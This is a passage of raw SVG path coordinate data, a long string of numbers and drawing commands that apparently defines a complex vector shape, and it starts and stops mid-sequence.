6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-